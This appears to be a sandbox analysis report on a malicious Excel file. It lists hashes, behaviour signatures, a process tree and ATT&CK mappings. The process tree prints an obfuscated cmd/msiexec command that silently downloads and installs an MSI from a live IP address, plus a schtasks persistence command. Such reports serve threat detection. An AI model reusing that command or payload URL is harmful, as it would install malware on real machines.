Analysis

  • max time kernel
    139s
  • max time network
    98s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    30-06-2020 12:33

General

  • Target

    978905601.xls

  • Size

    172KB

  • MD5

    2a6b788cb122676d3890312e754bfc90

  • SHA1

    5744f5012d120edd79f1bb1ed0272b28712127e4

  • SHA256

    0018a5d18456d36582b1020be78a055c9c126a8036c618ea956faf722d995bb2

  • SHA512

    39a0f085979668395beb3d7a23144cbfeba6c849586bc7a4c5759dc455f3964877ea57795df19bf560a4c9a03a283f0671d656888c8969f8cb7ac58e84cc12a5

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Executes dropped EXE 6 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in Windows directory 6 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\978905601.xls
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1400
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/978905601.msi /qn
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:552
      • C:\Windows\system32\msiexec.exe
        msiExec /i http://199.195.250.60/gg/978905601.msi /qn
        3⤵
        • Use of msiexec (install) with remote resource
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of AdjustPrivilegeToken
        PID:1072
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\Installer\MSIDE30.tmp
      "C:\Windows\Installer\MSIDE30.tmp"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:760
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qzoutxtRkpOte" /XML "C:\Users\Admin\AppData\Local\Temp\tmp78D7.tmp"
        3⤵
        • Creates scheduled task(s)
        PID:1960
      • C:\Windows\Installer\MSIDE30.tmp
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:2024
      • C:\Windows\Installer\MSIDE30.tmp
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:612
      • C:\Windows\Installer\MSIDE30.tmp
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:1164
      • C:\Windows\Installer\MSIDE30.tmp
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:684
      • C:\Windows\Installer\MSIDE30.tmp
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:1360

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp78D7.tmp
  • C:\Windows\Installer\MSIDE30.tmp
  • C:\Windows\Installer\MSIDE30.tmp
  • C:\Windows\Installer\MSIDE30.tmp
  • C:\Windows\Installer\MSIDE30.tmp
  • C:\Windows\Installer\MSIDE30.tmp
  • C:\Windows\Installer\MSIDE30.tmp
  • C:\Windows\Installer\MSIDE30.tmp
  • memory/552-2-0x0000000000000000-mapping.dmp
  • memory/760-12-0x0000000000000000-0x0000000000000000-disk.dmp
  • memory/760-8-0x0000000000000000-mapping.dmp
  • memory/1072-3-0x0000000000000000-mapping.dmp
  • memory/1072-23-0x0000000002120000-0x0000000002124000-memory.dmp
    Filesize

    16KB

  • memory/1400-0-0x0000000006060000-0x0000000006160000-memory.dmp
    Filesize

    1024KB

  • memory/1400-1-0x0000000006060000-0x0000000006160000-memory.dmp
    Filesize

    1024KB

  • memory/1500-6-0x0000000001510000-0x0000000001514000-memory.dmp
    Filesize

    16KB

  • memory/1500-5-0x0000000001510000-0x0000000001514000-memory.dmp
    Filesize

    16KB

  • memory/1500-4-0x0000000001B30000-0x0000000001B34000-memory.dmp
    Filesize

    16KB

  • memory/1500-20-0x0000000002760000-0x0000000002764000-memory.dmp
    Filesize

    16KB

  • memory/1500-21-0x0000000001510000-0x0000000001514000-memory.dmp
    Filesize

    16KB

  • memory/1500-22-0x0000000002760000-0x0000000002764000-memory.dmp
    Filesize

    16KB

  • memory/1960-13-0x0000000000000000-mapping.dmp